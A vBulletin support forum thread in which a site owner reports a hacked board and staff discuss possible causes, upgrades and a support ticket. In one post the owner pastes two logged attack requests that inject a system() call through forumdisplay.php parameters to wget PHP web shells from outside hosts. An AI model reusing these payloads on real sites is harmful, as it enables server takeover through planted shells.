was just hacked

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ImportPassion.com
    Senior Member
    • Dec 2002
    • 257
    • 3.6.x

    was just hacked

    I beleive it was through vB cause they deleted admincp and include. I don't have the most recent version, but I have done all the security upgrades. THey were also able to upload php files. How would this have been done? This is the first time in almost 4.5 years!
  • Zachery
    Former vBulletin Support
    • Jul 2002
    • 59097

    #2
    Its impossible to delete any files via vB, your server and or passwords have been comprimised.

    Comment

    • Jake Bunce
      Senior Member
      • Dec 2000
      • 46598
      • 3.6.x

      #3
      If they were able to delete directories and upload files, then your server was probably compromised. You should change all server passwords and update your server software. Contact your host to see if they can examine your logs and come to any conclusion about what happened.

      Comment

      • ImportPassion.com
        Senior Member
        • Dec 2002
        • 257
        • 3.6.x

        #4
        it wasn't through the server. I have my admin guy going through it. they only targetted my vb directory.

        I wouldn't say it's impossible either.

        Comment

        • Zachery
          Former vBulletin Support
          • Jul 2002
          • 59097

          #5
          Unless you have a hack, it is near impossible to use vBulletin to delete files, its notwithin vB's builtin ability to do so.

          ftp or other system access has been comprimised.

          Comment

          • Jake Bunce
            Senior Member
            • Dec 2000
            • 46598
            • 3.6.x

            #6
            Originally posted by 7thgencivic.com
            it wasn't through the server. I have my admin guy going through it. they only targetted my vb directory.
            That isn't conclusive. I can login to a server and delete files... that doesn't mean those files are to blame.

            Originally posted by 7thgencivic.com
            I wouldn't say it's impossible either.
            How about unlikely.

            It is possible for PHP scripts to be written such that malicious users can inject system commands for execution. There are no such exploits in the current version of vBulletin. Also, vB3 was coded with security in mind. So unless this is a new exploit in vBulletin, then your directories were deleted by some other means.

            Comment

            • Steve Machol
              Former Customer Support Manager
              • Jul 2000
              • 154488

              #7
              Assuming you did not enable HTML in posts or sigs, and did not install a hack with a significant vunerability, then there is no way someone could have deleted directories and files on your server through vB.
              Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
              Change CKEditor Colors to Match Style (for 4.1.4 and above)

              Steve Machol Photography


              Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


              Comment

              • ImportPassion.com
                Senior Member
                • Dec 2002
                • 257
                • 3.6.x

                #8
                well, i just found these in my logs

                Code:
                /forums/forumdisplay.php?f=3&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=wget%20http://myweb.saudi.net.sa/shell.php
                
                /forums/forumdisplay.php?f=3&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=wget%20http://www.freewebtown.com/haa3/supershell.php

                Comment

                • Boxy
                  Senior Member
                  • Oct 2002
                  • 3139

                  #9
                  What version of vB are you running?

                  Comment

                  • ImportPassion.com
                    Senior Member
                    • Dec 2002
                    • 257
                    • 3.6.x

                    #10
                    found anotyher one. i have 3.02, but all the security upgrades that u realeased.

                    Comment

                    • Boxy
                      Senior Member
                      • Oct 2002
                      • 3139

                      #11
                      Can we get access to your forums?

                      Fill out a support ticket at:

                      http://www.vbulletin.com/members/me...contactform.php

                      Be sure to include the login info to your Admin CP, phpMyAdmin and FTP.

                      Comment

                      • ImportPassion.com
                        Senior Member
                        • Dec 2002
                        • 257
                        • 3.6.x

                        #12
                        sent

                        do u know if something like this has been addressed already?

                        Comment

                        • Steve Machol
                          Former Customer Support Manager
                          • Jul 2000
                          • 154488

                          #13
                          Is there any reason you just don't upgrade to 3.0.7? If you have hacks installed then we are limiited in how much help we can provide.
                          Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                          Change CKEditor Colors to Match Style (for 4.1.4 and above)

                          Steve Machol Photography


                          Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                          Comment

                          • ImportPassion.com
                            Senior Member
                            • Dec 2002
                            • 257
                            • 3.6.x

                            #14
                            i do have hacks. I don't know too many sites that don't. u can only go so far on a stock install and ppl will get bored.

                            If this was fixed already, please let me know where to get the update.

                            I was going to wait for 3.5 and redo it all from there.

                            Comment

                            • Zachery
                              Former vBulletin Support
                              • Jul 2002
                              • 59097

                              #15
                              7thgencivic you'd be suprised, there is an insanely large part of our client base that does not modifiy their forums period. Hacked boards are a miniorty. And you do not need hacks to keep a board active

                              We would need to see server logs to be able to tell how they got in specificly.

                              If you did get effected by that shell script its not going to be fun cleaning.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...